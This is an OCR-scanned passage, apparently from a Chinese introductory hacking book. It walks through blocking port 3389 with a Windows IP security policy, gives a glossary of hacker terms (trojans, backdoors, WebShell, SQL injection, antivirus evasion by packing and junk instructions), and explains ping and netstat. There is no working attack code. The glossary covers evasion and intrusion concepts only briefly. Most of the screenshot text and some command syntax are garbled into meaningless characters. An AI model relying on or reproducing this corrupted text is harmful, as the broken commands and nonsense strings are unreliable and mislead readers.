对 于 Windows 用 户 ， 可 以 随意 选择 对 服务 融 端 口 的 限制 。 在 系统 默认 情况 下 ， 
许多 没 用 或 者 有 和 危险 的 端口 默认 为 开局 的 ， 可 以 选择 将 这 些 端口 关闭 。 例 如 3389 端 
口 是 一 个 危险 的 端口 ， 但 是 系统 默认 该 问 口 为 开局 ， 用 户 可 通过 使 用 IP 策略 阻止 访 
问 该 端口。 

有 具体 设置 的 操作 步骤 如 下 。 


STEP0 信 打开 “管理 工具 ”窗口 STEP02: 创建 IP 安全 策略 


-= > 上 公 铀 策略 - 
< 由 公 铂 策略 
OO rm, sera -|4| ssserze 7|| | (3 软件 限制 策略 E 
文件 (有 ” 妃 久 (过 看 (V)】 工具 Mm 帮助 (H) . er 软件 限制 策略 
Ev 团 - 外 1 一 = == = EL 
加 名 黎 | 修改 日 其 类 型 “ 


罕 Internet 信息 服务 (I19) 管 理 名 2013/12/16 10:56 。 快捷 方 > 天 

@ iscsr Sie 2009/7/14 1241 管理 IP 入 选 器 列表 和 笠 选 器 操作 (M)... 
狼 windows PowerShell Modules 2009/7/14 12:52 
其 ] Windows 内 存 诊断 2009/7/14 12:41 


2011/5/26 10:15 3 所 有 性 务 ( 同 


2011/5/26 10:15  。 快 # 
2009/7/14 12:41 刷新 (F) 
2009/7/14 12:41 
2009/7/14 12:41 + 
2009/7/14 12:42 E 帮助 {H) 


2009/7/14 12:42 


本 地 安全 策略 
快捷 方式 
大 小 : 1.21 KB 


双击 “本 地 安全 策略 ”选项 。 右 击 “IP 安 全 策略 在 本 地 计算 机 ”选项 ,在 弹出 的 
快捷 菜单 中 选择 “创建 IP 安全 策略 ”命令 。 


IF 


工具 全 攻略 
全 人 人 他 
STEP03: ”|P 安全 策略 向 时 STEP04: 输入 安全 策略 名 称 


a IP 安全 策略 名 称 
欢迎 使 用 IP 安全 策略 向 导 命名 这 个 IP 安全 策略 并 且 给 出 一 个 简短 的 措 述 


的 人 全 第 略 。 你 将 指 宕 对 E | 名 称 00: 
主 兴 天 | ， 所 和 到 
下 汪 二 尖 站 ， < 镶 Br 时 沿 吕 限制 访 i 可 3389 端 口 


单 击 “ 下 一 步 ” 继 续 。 


单 击 “ 下 一 步 ”按钮 。 输入 名 称 及 描述 。”” 轿 单 击 “ 下 一 步 ” 按 钮 。 
信息 。 
STEP05: 安全 通信 请 求 STEP06: 完成 IP 安全 策略 的 创建 


全 通讯 请 求 Se 阿 
指定 这 个 策略 如 何 对 安全 通讯 的 请 求 作出 响应 。 正在 完成 IP 安全 策略 向 导 


全 机 | 你 已 成 地 计 左 定 的 新 安全 第 时 的 属性 。 
计时 : 奴 在 运行 Windows 2003 和 Windows XP 的 计算 机 上 支持 默认 响应 规 要 六 中江 重信 的 IP 条 第 上 : 请 选中 “编辑 属性 ” 揽 


本 激活 默认 响应 规 风 | (限于 indows 的 早期 版 本 ) (R)。 口 编 辑 属 性 外) 


| | 若 要 关闭 此 疝 导 ， 请 单 击 “ 完 成 ”。 


光 
国 取消 勺 选 该 复 选 框 。 国 单 击 “下 一 步 ” 国 取 消 色 选 “编辑 属性 ” 国 单 击 “ 完 成 " 按钮 
按钮 。 复 选 框 。 
STEP07: 管理 IP 筛选 器 列表 和 惫 选 器 操作 ”STEP08: 进入 “管理 IP 筛选 器 列表 ”选项 卡 
》 国 公 届 第 略 管理 人 P 位 迁 器 列表 和 入 迁 匡 党 作 ey) 


> 站 软件 限制 策略 
> 四 应 用 程序 控制 策略 


0 晶 天 当 。 创建 IP 安全 策略 (C)- 
”一 [PP 凡是/ 天 和 仿 先 党 尝 作 (M).. 


管理 IT 肇 选 器 列表 | 管理 闹 选 器 操作 
j 话 框 允许 您 创建 并 维护 定 久 您 的 网 络 流 里 的 IP 许 
岩 对 请 代 人 许 创建 并 维护 定义 爷 的 网 络 流量 的 TP 入 


所 有 IF 安全 策略 都 共享 这 些 可 用 的 IP 彤 选 器 列表 。 


IF 彤 选 器 列表 让 ): 


所 有 任务 (向 
查看 (V) 


刷新 (P 
导出 列表 (LD).. 


帮助 (H) 


描述 


| 编辑 在 ). .| | 有 是 除 ) | 


上 和 证 = [EE 取消 ej | 上 用 | 


右 击 “|IP 安全 策略 ”选项 ， 在 弹出 的 快捷 菜单 中 选单 击 “添加 ”按钮 。 
择 “ 管 理 IP 筛选 器 列表 和 惫 选 器 操作 ”命令 。 
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STEP09: 添加 指定 名 称 的 筛选 器 STEP10: IIP 筛选 器 向 导 


IP 六 二 于 由 名 个 病 先 各 组 成 。 这 样 ， 多 个 子 网 、I 地 址 和 协议 可 被 整 


一 号 en 
二 合 到 一 -1 
一 一 


名 称 加 ) : 
3389 吴 口 筛 选 器 
EE 
^| | 编辑 EF)...， | 
”| 是 除名 ) 
严 入 选 器 人 ) 团 使 用 中 天 加 向 导 ”0) 
镜像 ” ”描述 源 DNS 名 称 源 地 址 


助 您 提供 簿 选 IP 流量 需要 的 源 、 目 标 和 通信 


0 


o 


单 击 “ 下 一 步 ”继续 。 


输入 筛选 器 名 称 。 单 击 “ 添 加 ”按钮 。 单 击 “下 一 步 ”按钮 。 
STEP11: IP 筛选 器 描述 和 镜像 属性 STEP12: 选择 源 地 址 


入 和 和信 信 属性 
i 


描述 0): 
限制 运行 3369 端 口 。 


镜像 W)。 与 源 地 址 和 目标 地 址 正好 相反 的 数据 包 相 匹配 。 


辆 在 文本 框 中 输入 描述 辆 单 击 “下 一 步 * 在 下 拉 列 表 中 选择 单 击 “ 下 一 步 " 
信息 。 按钮 。 IP 流量 的 源 地 址 。 按钮 。 
STEP13: 选择 目标 地 址 STEP14: 选择 IP 协议 类 型 


流量 目标 I 协议 类 型 | 
指定 IP 流量 的 目标 地 址 。 诸 绎 IF 协 说 类 型 。 如 果 类 型 是 TCF 或 UP， 您 将 同时 指定 源 和 目标 端 


目标 地 址 m): 选择 协议 类 型 (3): 


p+, a 


在 下 拉 列 表 中 选择 单 击 “ 下 一 步 ” 国 在 下 拉 列表 中 选择 单 击 “ 下 一 步 " 
IP 流量 的 目标 地 址 。 按钮 。 IP 协议 类 型 为 “TCP"。 按钮。 


11 国 0 


ST IF 一 一 


PE 
STEP15: 选择 IP 协议 端口 


工具 全 攻略 


I 协议 端口 > | 
许多 TCP/IP 应 用 程序 协议 建立 在 常用 的 TCF 或 DP 端口 上 。 


设置 IP 协议 疯 口 : 
昌 从 任意 端口 于 ) 
名 从 此 端口 呈 ): 
| 
中 到 任意 端口 (1) 
@@ 到 此 端口 中 ) : 
3389| 


IE 


选中 “从 任意 端口 ”“ 到 
此 端口 ” 单 选 按钮 ， 此 端口 
的 端口 号 设置 为 3389。 

STEP17: 返回 “IP 筛选 器 列表 ”对 话 框 


下 | Ip 第 选 锋 列表 
IF 所 这 样 ， 条 个 子 网 、 了 地址 和 协 识 可 被 整 


合 到 一 ?1 
名 称 的 ] : 
3389 端 口 簿 选 器 
撤 述 中) 
- 


回 使 用 “添加 向 导 ” 


按钮 。 


IF 渍 选 器 (8): 
镜像 ”描述 源 DNS 名 称 源 地 址 
是 限制 运行 3389.. 《< 任 何 IP 地 址 > ”< 任何 王 地 址 > 


4 | Wl 


查看 已 创建 的 筛选 器 ， 并 单 击 “ 确 定 ” 按 钮 。 


STEP19: 设置 筛选 器 操作 为 阻止 
新 秘 选 器 操作 恒 性 “ 湖 髓 更 


加 阻止 0) 
局 协商 安全 的 ) : 
上 称 届 ) 


类 型 ”由 完整 性 ESP 机 密 性 


[| 接受 不 安全 的 通讯 ， 但 始终 用 Isse 响应 并) 
如 果 无 法 建立 安全 储 接 ; 则 分 主 回 退 到 不 安全 的 通信 W) 
[| 使 用 会 话 密 胃 充 全 向 前 保密 中 FS) (k) 


选择 “阻止 " 单 选 按钮 。 国 单 击 “ 确 定 " 按钮 。 国 查看 已 添加 的 


STEP16: ”完成 IP 筛选 器 的 创建 
IP 入 选 器 向 导 ， 
正在 完成 IP 筛选 器 向 导 
您 已 成 功 地 完成 IF 辛 选 器 向 导 。 
可 汪 岂 各 吉 第 提 生计， 请 选中 “编辑 属性 ” 复 选 


加 编辑 属性 辫 ) 


| | 若 要 关闭 此 向 导 : 请 单 击 “完成 ”。 


单 击 “下 一 步 ” 图 取消 义 选 “编辑 属性 ” 图 单 击 “ 完 成 ”按钮 。 


复 选 框 。 


STEP18: 管理 筛选 器 操作 
管理 IP 条 选 器 列表 和 科 选 器 操作 


管理 立 沛 先 器 列表 | 管理 闹 选 器 操作 | 


本 相信 你 机 请 并 推拉 定义 全 宙 全 有 和 


所 有 IP 究 全 策略 共享 可 用 的 闹 选 强 操 作 。 
簿 选 证 操作 FF): 
名 称 


ET ET 


是 除 () 回信 用 深 加 刁 


切换 至 “ 管 取消 勾 选 “使 用 ' 添 加 


理 筛选 器 操作 ” 向 导 '” 复 选 框 ， 然 后 单 击 
选项 卡 。 “添加 ”按钮 。 
STEP20: 成 功 添加 筛选 器 操作 


管理 IP 利 选 器 列表 和 着 选 器 操作 
管理 IT 乌 选 器 列表 | 管理 洱 选 器 操作 
屁 对 滞 框 使 多 能 创建 并 维护 定义 您 的 内 络 安全 的 沁 选 
所 有 IF 安全 策略 共享 可 用 的 凯 选 器 操作 。 


策 选 强 操 作 中 ): 


由 新 沛 选 器 操作 


而 和 站 全 用 “党 
Se 


单 击 “ 关 闭 ” 按 钮 。 
筛选 器 操作 。 
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STEP21: 返回 “本 地 安全 策略 ”窗口 


文件 (FP) ”操作 (A) 前 看 WV) 帮助 (H) Ee 
旬 时 | 方 国 | 兴国 对 | 回国 | 过 卫 | 也 曙 


4 = 限制 访问 3389 诡 口 

:| [ 马 本 地 策略 
| 站 高 级 安全 Windows 防火 培 

器 网 络 列表 管理 器 策略 
;| 站 公 租 策略 
>| 站 软件 限制 策略 
:| 站 | 应 用 程序 控制 策略 
:| 仿 IP 安全 策略 ， 在 本 地 计算 机 
;| 门 高 级 富 核 策略 配置 


双击 创建 的 IP 安全 策略 。 
STEP23: 创建 IP 安全 规则 


安全 规则 向 导 
欢迎 使 用 创建 IP 安全 规则 向 导 


FN 


li 
安 


全 操作 : 


IP 隧道 操作 属性 

身份 验证 方法 
乌 选 器 操作 

单 击 “ 下 一 步 ” 继续 。 


单 击 “ 下 一 步 ” 按 钮 。 


STEP25: 选择 网 络 类 型 


安全 规则 向 导 = 


网 络 类 型 
安全 规则 必须 应 用 到 一 种 了 网络 类 型 。 


选择 网 络 类 型 : 

回 所 有 网络 连接 总 ) 
全 局 域 网 CLAN CD) 
人 各 远程 访问 R) 


选中 “所 有 网 络 
连接 ” 单 选 按钮 。 


3 


单 击 “ 下 一 步 按钮 。 国 选中 “3389 端 D 


第 1 章 
从 零 开 始 认 识 黑 各 


STEP22: 添加 1P 规则 
限制 访问 3389 庄 口 硬性 


加 记 和 其 他 计算 机 通讯 的 安全 规则 


IP 安全 规则 (I): 
IF 渍 选 器 列表 星 选 器 操作 身份 验证 方法 隧 
口 媚态 > 默认 吧 应 Cf 限于. .. Kerberos 《< 柯 


qd 中 Mm 
加 全 < 
在 “规则 ”选项 卡 单 击 “ 添 加 ”按钮 。 


STEP24: 指定 IP 安全 规则 的 隧道 终结 点 


道 终 结 点 
道 终 结 点 是 近 IP 流 款 的 隧道 操作 1; , 刚 的 
外线 扩 加 世 琶 接 引 - 玛 。 量 目 标的 隧道 操作 计算 机 ， 正 如 安全 规 由 的 


或 于 外 部 计 彼 丘 昌 在 两 全 计划 机 间 以 直 摘 H 吉 用 连接 各 安全 级 4 畏 过 公用 


指定 IF 安全 规则 的 隧道 终结 点 : 

器 此 规则 不 指定 隧道 〇 ) 

各 隧道 终结 点 由 下 列 IF 地 址 指定 (I): 
IFv4 隧道 终结 点 : 
| 
TPv6 隧道 终结 点 : 
] 


选 定 “ 此 规则 不 指定 Be ee 
隧道 单 选 按钮 。 按钮 。 
STEP26: 选择 IP 和 希 选 器 


安全 规则 向 导 


IF 


筛选 器 列表 
请 为 采用 这 个 安全 规则 的 IF 流量 类 型 选择 IP 旺 选 器 列表 。 


如 果 下 面 的 列表 没有 符合 您 需要 的 IP 闹 选 强 ， 请 单 击 “ 汪 加 ”来 创建 新 的 。 


IP 贮 选 器 列表 (I): 


© EE 编辑 EE)... 


< 上 一 步 @j 下 一 步 o > 


到 


单 击 “ 下 一 步 ”按钮 。 


筛选 器 ” 单 选 按钮 。 


ST FP 


工具 全 攻略 
PE 


STEP27: 选择 筛选 器 操作 STEP28: 完成 安全 规则 创建 
安全 规则 向 导 = 加 安全 规则 向 导 = Ey 


正在 完成 安全 规则 向 导 


选 器 操作 
请 为 这 个 安全 规 风 选 择 病 选 强 操 作 。 


您 已 成 功 完成 指定 您 的 新 规 刚 的 属性 。 


训 果 信 要 所 神 表 未 兴 有 和 合集 村 和 这 渤 绕 接 作 : 请 单 击 “ 添 加 ”创建 一 个 新 

簿 选 避 操 作 CC): 加 | 使 用 “添加 向 号 ”(W) 

和 ET 

| © EE ET 
RE ] 


要 及 加 人 的 安全 规则 ， 请 寺 择 “编辑 导 性 ”然后 


|| 日 编 辑 属 性 外 ) 


若 要 关闭 此 9 号 ， 请 单 击 “ 完 成 ”。 


1 上 二 到 6 下 未 m > 《上 =-- 步 6) 儿 _ 成“] 


国 选中 “新 筛选 器 单 击 “ 下 一 步 ” 国 取消 勾 选 “编辑 单 击 “ 完 成 ”按钮 。 

操作 ” 单 选 按钮 。 按钮 。 属性 ” 复 选 框 。 

STEP29: 返回 “限制 访问 3389 端口 属性 ” STEP30: 返回 “本 地 安全 策略 ”对 话 杠 
对 话 框 


限制 访问 3389 诗 口 尾 性 
文件 ( ”操作 (A) ”查看 (V) ”帮助 (H) 
忽 申 | 方 国 X 日 Sig 厨 | 生计 | 和 2 


国 沁 和 其 他 计算 机 通讯 的 安全 规 风 也 安全 设置 
b> 加 帐户 策略 


, [6 本 地 策略 
MN ， 国 高 级 安全 Windows 防火 坟 ee 
IF 师 选 器 列表 师 选 器 操作 身份 验证 方法 ” 隧 辐 网 络 列表 管理 器 策略 
加 3389 丝 口 遍 选 器 。 新 泣 选 器 操作 < 元 > 无 》” 辐 | 公 铀 策略 删除 (D) 
四 < 访 > 默认 响应 ( 保 限 于 .. ， Kerberos 《可 ，[ 软件 限制 策略 重 命 名 (MI) 
1 [a | | 


. 4 ， 国 应 用 程序 控制 策略 


二 了 大] 包公 用 “添加 各 , 略 下 安全 策略 , 在 本 地 计算 机 ei 
于 站 高 级 宗 校 策略 配 置 帮助 (H) 


单 击 “确定 ”按钮 。 右 击 新 建 的 1P 安 全 策略 并 在 弹出 的 快捷 菜单 中 选择 
“分 配 ”命令 完成 设置 。 


1.4.{ 黑客 常用 术语 


1. 肉鸡 

肉鸡 比喻 那些 可 以 随意 被 黑客 控制 的 计算 机 ， 黑 客 可 以 像 操 作 本 地 计算 机 那样 来 操作 
它们 ， 而 不 航 对 方 所 发 觉 。 

2. 木马 

木马 指 表面 上 伪装 成 正常 的 程序 ， 但 是 当 这 些 被 程序 运行 时 ， 束 会 获取 系统 的 整个 控 
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< 第 1 章 
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制 权 限 。 有 很 多 黑客 就 是 热衷 于 使 用 木马 程序 来 控制 别人 的 计算 机 ， 比 如 灰 饮 子 、 黑 润 、 
PcShare 等 。 

3. 网 页 木马 

网 页 木马 指 表面 上 伪装 成 普通 的 网 页 文件 或 是 将 代码 直接 插入 正 第 的 网 页 文件 中 ， 当 
有 人 访问 时 ， 网 页 木马 孢 会 利用 对 方 系统 或 者 浏览 右 的 漏洞 目 动 将 配置 好 木马 的 服务 端 下 
载 到 访问 痢 的 计算 机 上 来 和 目 动 执行 。 

4. 挂 马 


Ei 以 人 旭 唱 员 首 “时 

5. 后 门 

这 是 一 种 形象 的 比喻 ， 黑 客 在 利用 某 些 方法 成 功 地 控制 了 目标 主机 后 ， 可 以 在 对 方 的 
系统 中 植 入 特定 的 程序 ， 或 者 是 修改 某 些 设置 。 这 些 改动 表面 上 是 很 难 被 察觉 的 ， 但 是 黑 
客 却 可 以 使 用 相应 的 程序 或 者 方法 来 轻易 地 与 这 人 台 计 算 机 建立 连接 , 重新 控制 这 侣 计算机， 
束 好 像 是 黑客 偷偷 地 配 了 一 把 主人 房间 的 钥匙 ， 可 以 随时 进出 而 不 被 主人 友 现 一 样 。 通 前 
大 多 数 的 特洛伊 木马 程序 都 可 以 被 入 侵 者 用 于 制作 后 门 。 

6. IPCS 

它 是 共享 “命名 管道 ”的 资源 ， 是 为 了 让 进程 间 通 信和 而 开放 的 命名 管道 ， 可 以 通 
过 验证 用 户 名 和 密码 获得 相应 的 权限 ， 在 远程 管理 计算 机 和 查看 计算 机 的 共享 资源 时 
便 肝 8 


7. 弱 口 令 
指 那些 强度 不 够 、 容 易 被 猜 解 的 类 似 “123””“abc” 这 样 的 口令 “〈 密 人 码 )。 
8. Shell 


Shell 指 的 是 一 种 命令 执行 环境 ， 比 如 我 们 按 下 键盘 上 的 《开始 键 +R》 时 出 现 “ 运 行 ” 
对 话 框 , 在 里 面 输 入 “cmd” 会 出 现 一 个 用 于 执行 命令 的 黑 窗 口 , 这 个 束 是 Windows 的 Shell 
执行 环境 。 

9. WebShell 

WebShell 束 是 以 asp、php、jsp 或 者 cgi 等 网 页 文件 形式 存在 的 一 种 命令 执行 环境 ， 也 
可 以 将 其 称 作 是 一 种 网 页 后 门 。 

10. 溢出 

确切 地 讲 ， 应 该 是 “ 绥 冲 区 注 出 ”。 人 简单 的 解释 就 是 程序 对 接收 的 输入 数据 没有 执行 有 
效 的 检测 而 导致 错误 ， 后 果 可 能 是 造成 程序 骨 误 或 者 是 执行 攻击 者 的 命令 。 洲 出 大 致 可 以 
分 为 两 类 : 堆 溢 出 和 栈 溢出 。 

11. 注入 

由 于 程序 员 的 水 平 参差 不 齐 ， 相 当 大 一 部 分 应 用 程序 存在 安全 隐患 。 如 用 户 可 以 提交 
一 段 数 据 库 得 询 代 码 , 根据 程序 返回 的 结束 获得 某 些 他 想 知道 的 数据 , 这 个 就 是 SQL 注入 。 

12. 注入 点 

注入 点 即 可 以 实行 注入 的 地 方 ， 通 党 是 一 个 访问 数据 库 的 连接 。 根 据 注 入 点 数据 库 的 
运行 账号 的 权限 不 同 ， 用 户 所 得 到 的 权限 也 不 同 。 


客 过 
区 -工具 人 攻 了 


全 人 人 他 
13. 内 网 
内 网 ， 通 俗 地 讲 束 是 局 域 网 ， 如 网 吧 、 校 园 网 、 公 司 内 部 网 等 都 属于 此 类 。 查 看 IP 地 
址 时 如 果 是 在 以 下 三 个 范围 之 内 的 话 ， 束 说 明 我 们 是 处 于 内 网 之 中 : 10.0.0.0 一 
10.255.255.255, 172.16.0.0~172.31.255.255,，192.168.0.0~192.168.255.255。 


14. 外 网 

外 网 下 接连 入 互联 网 ， 可 以 与 互联 网 上 任意 一 台 计 算 机 互相 访问 。 

15. 免 杀 

免 杀 是 指 通 过 加 壳 、 加 密 、 修 改 特征 码 、 加 花 指 令 等 技术 来 修改 程序 ， 使 其 逃 过 杀毒 
软件 的 但 攻 。 

16. 加 过 


加 壳 即 利用 特殊 的 算法 ， 改 变 EXE 可 执行 程序 或 者 DLL 动态 链接 库 文 件 的 编码 〈 比 
如 实现 压缩 、 加 黎 )， 以 达到 缩小 文件 体积 或 者 加 密 程序 编 权 ， 甚 全 是 躲 过 杀毒 软件 得 杀 的 
目的 。 目 前 较 和 常用 的 元 有 UPX、ASPack、PePack、PECompact、UPack 等 。 

17. 花 指令 

化 指令 即 儿 句 汇 编 指 令 ， 通 过 让 沪 编 语句 进行 一 些 跳 转 ， 使 得 杀毒 软件 不 能 正常 地 判 
叶 病 毒 文 件 的 构造 。 说 通俗 点 就 是 条 毒 软件 是 从 涉 到 脚 按 顺序 来 合 找 病毒 ， 如 果 我 们 把 病 
毒 的 涉 和 脚 右 倒 位 置 ， 儿 毒 软 件 不 找 不 到 病毒 了 。 


1.4.2 测试 物理 网 络 的 nind 命令 


ping 命令 是 测试 网 络 连接 、 信 和 息 发 送 和 接收 状况 的 实用 型 工具 ， 有 是 一 个 系统 内 置 的 控 
测 工 具 。 它 所 利用 的 原理 是 :网络 上 的 机 可 部 有 了 唯一 确定 的 IP 地 址 ， 用 户 给 目标 IP 地 址 
发 送 一 个 数据 包 ， 对 方 就 要 返回 一 个 同样 大 小 的 数据 包 ， 根 据 返 回 的 数据 包 用 户 可 以 确定 
目标 主机 的 存在 , 可 以 初步 判断 目标 主机 的 操作 系统 等 。 通过 在 命令 提示 符 下 输入 “ping /2” 
命令 ， 即 可 合 看 ping 命令 的 详细 说 明 ， 如 下 图 所 示 。 


n Sizod LI LEI LL 0 L968 
unt] [[-j host-list] ! [-k host—-list]] 


Un 七 s Count 1 10 St 1st ' 
w timeout S$ srcaddr] [-41 [-6] target_name 


查看 ping 命令 的 详细 说 明 


1; 语法 
GLng Ist] .Isal [=m CoOUuntl] I=L SLiZe), [=f| [=L Tt [=Y tos| |=Y CO |*=s 


count] [= ~Host list] | [=k Host—ligst] [= 六 timeout]|] destination=l1igst 
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ee 
: 不 断 使 用 ping De 要 中 断 并 退出 ping， 只 
《Ctrlt+C〉 组 合 键 。 初级 黑客 常常 喜欢 使 用 这 个 参数 对 目标 计算 机 进行 
J 
指定 对 目的 地 IP 地 址 进行 反问 名 称 解 析 。 如 解析 成 功 ，ping 将 显示 相应 
的 主机 名 。 
@ -ncount: 指定 发 送 回 吗 请 求 消息 的 次 数 ， 默 认 值 为 4。 
@ -1 size: 指定 发 送 的 回 啊 请 求 消 县 中 “数据 ”字段 的 长 度 《〈 以 字 和 表示 )。 默 认 值 为 
如 下 图 所 示 。size 的 最 大 值 是 65 527。 


国 管理 抽 : C:\Windows\system32\cmd.exe 

C:\sers dninistrator> 

C:\sers fdninistrator> 
CUsekhsndministkatrok>ping 192.168.1.255 


正在 Ping 192.168.1.255 3 字 节 的 数据 : 
来 目 192.168.1.1 的 回复 :| 字 记 =32| 时 | 站 <ims TTL=64 
< 自 192.168.1.1 的 回复 :|: 


= 192.168.1.1 的 回复 : 
192.168.1.1 的 回复 


192.168.1.255 的 Ping 
米 上 - 已 发 送 = 


往返 的 信 计 时 间 加 (以 训 


:UsekrsnhdministkFatork>。 


查看 数据 字 节 的 默认 长 度 


) 检测 本 机 网 卡 驱 动 程序 以 及 TCP/IP 协议 是 否 
车 想 检测 本 机 的 网 卡 驱 动 程序 以 及 TCP/IP ee 以 IP 地 址 为 192.168.1.255 
为 例 ， 只 和 需要 在 命令 提示 符 窗口 中 输入 “ping 192.168.1.255” 命 令 即 可 。 


5 管理 员 : C\Windows\system32\cmd.exe 
a = 日 ms ， 最 长 = Bms ， 平 均 = lms 


CUserkrsnhdministrFatorkr>DIng 192.168.1.255 


正在 Ping 192.168.1.255 < 32 字 节 的 数据 : 

E 192.168.1.1 的 回复 : 字 节 =32 时 间 <ins TTL=64 
192.168.1.1 的 回复 : 字 节 =32 时 则 <ins TTL=64 
192.168.1.1 的 回复 : 宁 节 - =32 时 | 日 <tims TTL=64 
192.168.1.1 的 回复 : 字 节 =32 时 全 <tms TTL=64 


192 .168 . 255 的 了 ing 搞 计 悟 息 ,: 
沪 灯 E ; 


4, 美 唉 = 
往返 [得 的 信 计 全 癌 秒 为 单位 ?: 
于 = Gms, 最 长 = = Bms ， 平 均 


CsekhsNndministhatok> 


仿 测 本 机 
(2) 多 参数 合用 检测 
若 要 在 命令 提示 符 窗 口中 输入 “ping -a -t 192.168.1.255” 命 令 ， 即 可 对 
192.168.1.255 这 人 台 计 算 机 进行 探测 。 通 过 反馈 信息 可 得 知 上 述 命 令 中 ， 通 过 参数 “-a?” 
检测 出 了 该 机 器 的 NetBios 名 为 dns.sq.js.cn; 通过 参数 “-t” 可 不 断 问 该 机 发 送 数 
据 包 。 


WW 


客 过 


gms ， 平均 dms 


nistrator>ping -aa ~ 192.168.1.255 


正在 Ping 4L8QD1ETPGKU51W [192.168.1.255] 具有 32 字 节 的 数据 : 
3 192.168.1.1 的 回复 : 字 节 =32 时 | 间 <ims LS 
192.168-1.1 的 回复 : 军区 =32 让 ms TTL:= 


vata ht 


来 自 192.168.1.1 的 回复 : 字 节 =32 时 | s sy 
来 自 192.168.1.1 的 回复 : 字号 = Bl<ims TTL=64 
有 来自 192-168-1-1 的 加 进 : = 寸 | ms TITL=64 
六 目 回复: 字 节 = | s TIL=64 
来 自 回复 : 宇 Bl<ims TTL=64 
来 自 回复 : 宇 填 s TIL=64 
来 自 村 回复 : 字 节 =32 时 | 上 <lms TTL=64 
来 自 J 回复: 字 他 =32 时 | 日 <tms TTL=64 
来 自 回复 : 宇 节 =32 时 |I 昌 <tms TTL=64 
可 = 村 回复 : 字 玉 =32 旱田 <tms TTL=64 
全 目 192.168.1.1 的 回复 : 一 =32 时 | 日 <tms TTL=64 
BE 目 2 168- 1 .1 的 回复 : 子 “32 时 间 <lms TTL=64 
"mr 天 三 1 白 站 IP1* 上 局- pL .| 
多 参数 合用 检测 计算 机 


通常 ，ping 命令 会 反馈 如 下 两 种 结果 : 

1) 请 求 超时 。 We 也 就 是 说 网 络 不 通 。 出 现 这 
个 结果 的 原因 很 复杂 ， 通 常 包 插 对 方 装 和 有 防火 墙 并 禁止 ICMP 回 显 、 对 方 已 经 关机 、 本 机 
的 IP ne 网 线 不 通 等 。 

2) 来 自 192.168.1.255 的 回复 : 字 节 =32 时 间 <lms TTL=64。 表 示 网 络 畅通 ， 探 测 
使 用 的 数据 包 大 小 为 32 字 节 ， 啊 应 时 间 小 于 lms。TTL (Time To Live， 存 活 时 间 ) 是 
指 一 个 数据 包 在 网 络 中 的 生存 期 ， 网 管 可 通过 它 了 解 网 络 环境 ， 辅 助 维 护 工 作 ， 通 过 
TTL 值 可 以 粗略 判断 出 对 方 计 算 机 使 用 的 操作 系统 类 型 , 以 及 本 机 到 达 目 标 主机 所 经 过 
的 路 由 数 。 

当 检 查 本 机 的 网 络 连 通 情 况 时 ， 通 常会 使 用 ping 命令 给 某 个 目标 主机 (如 本 机 〉 发 送 
ICMP 数据 包 。 在 本 机 中 生成 ICMP 数据 包 时 ， 系 统 就 会 给 这 个 ICMP 数据 包 初 始 化 一 个 
TTL 值 ， 如 Windows 7 就 会 生成 “64” 将 这 个 ICMP 数据 包 发 送出 去 ， 遇 到 网 络 路 由 设备 
转发 时 TTL 值 束 会 被 减 去 “1”， 最 后 到 达 目 标 主机 。 如 果 在 转 友 过 程 上 TTL 值 变 成 “0?”， 
路 由 设备 就 会 丢弃 这 个 ICMP 数据 包 。 

TTL 值 在 网 络 应 用 中 很 有 用 处 , 可 以 根据 返回 信息 中 的 TTL 值 来 推断 发 送 的 数据 包 到 
达 目 标 主 机 所 经 过 的 路 由 数 。 路 由 发 生 在 OSI 网 络 参考 模型 中 的 第 三 层 即 网 络 层 。 


@ 不 同 的 操作 系统 ， 它 的 TTL 值 也 是 不 相同 的 。 默 认 情况 下 ，Linux 系统 的 


TTL 值 是 64 或 255，Windows NT/2000/XP 系统 的 TTL 值 为 128，Windows 98 
系统 的 值 为 32，Windows 7 系统 的 TTL 值 是 64，UNIX 系统 的 TTL 值 为 255. 


1.4.3 ”查看 网 络 连接 的 fletstat 命令 


netstat 是 一 个 监控 TCP/IP 网 络 非常 有 用 的 工具 ， 可 以 显示 路 由 表 、 实 际 的 网 络 连接 ， 
以 及 每 一 个 网 络 接口 设备 的 状态 信息 ， 可 以 让 用 户 得 知 目 前 都 有 哪些 网 络 连接 正在 运作 。 
netstat 用 于 显示 与 卫 、TCP、UDP 和 ICMP 协议 相关 的 统计 数据 ， 一 般 用 于 检验 本 机 各 端 
口 的 网 络 连 接 情 况 。 

如 果 有 时 候 计 算 机 接收 到 的 数据 报 出 错 或 出 现 故障 ， 不 必 感 到 奇怪 ，TCP/IP 可 以 容许 
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这 些 类 型 的 错误 并 目 动 重 发 数据 报 。 但 如 果 累 计 出 错 情况 占 到 所 接收 卫 数据 报 相 当 大 的 百 
分 比 ， 或 者 它 的 数目 正 迅速 增加 ， 束 应 该 使 用 netstat 但 一 查 为 什么 会 出 现 这 些 情 况 了 。 
一 般 用 “netstat -na” 命 令 来 显示 所 有 连接 的 端口 并 用 数字 表示 。 
1. 语法 


netgetat |=&]) [= 名] | 三 和 | | 二 和 | ‘|[=p PreotoeoLl] [=r) |=®] [interygl| 


2. 参数 说 明 

-a: 显示 所 有 活动 的 TCP 连接 以 及 计算 机 侦 听 的 TCP 和 UDP 端口 。 

-e: 显示 以 太 网 统计 信息 ， 如 发 送 和 接收 的 字 节 数 、 数 据 包 数 。 

-n: 显示 活动 的 TCP 连接 ， 但 只 以 数字 形式 表现 地 址 和 端口 号 ， 却 不 答 试 确定 名 称 。 

-0: 显示 活动 的 TCP 连接 并 包括 每 个 连接 的 进程 ID CPID)。 可 在 Windows 任务 
管理 器 的 “进程 ”选项 卡 上 找到 基于 PID 的 应 用 程序 。 该 参数 可 以 与 -a、-n 和 -p 结 
合 使 用 。 

-p protocol: 显示 protocol 所 指定 的 协议 的 连接 。 在 这 种 情况 下 ，protocol 可 以 是 TCP、 
UDP、TCPv6 或 UDPv6。 

-s: 按 协 议 显示 统计 信息 。 默 认 情 况 下 ， 显 示 TCP、UDP、ICMP 和 IP 协议 的 统计 
信息 。 

-T: 显示 IP 路 由 表 的 内 容 。 该 参数 与 route print 命令 等 价 。 

interval: 每 隔 interval 秒 重 新 显示 一 次 选 定 的 信息 。 近 《Ctrl+C)》 组 合 键 俘 止 重新 显示 
统计 信息 。 如 果 省 略 该 参数 ，netstat 将 只 打印 一 次 选 定 的 信息 。 

3 典型 示例 

netstat 命令 可 显示 活动 的 TCP 连接 、 计 算 机 侦 听 的 端口 、 以 大 网 统计 信息 、 卫 路 由 表 、 
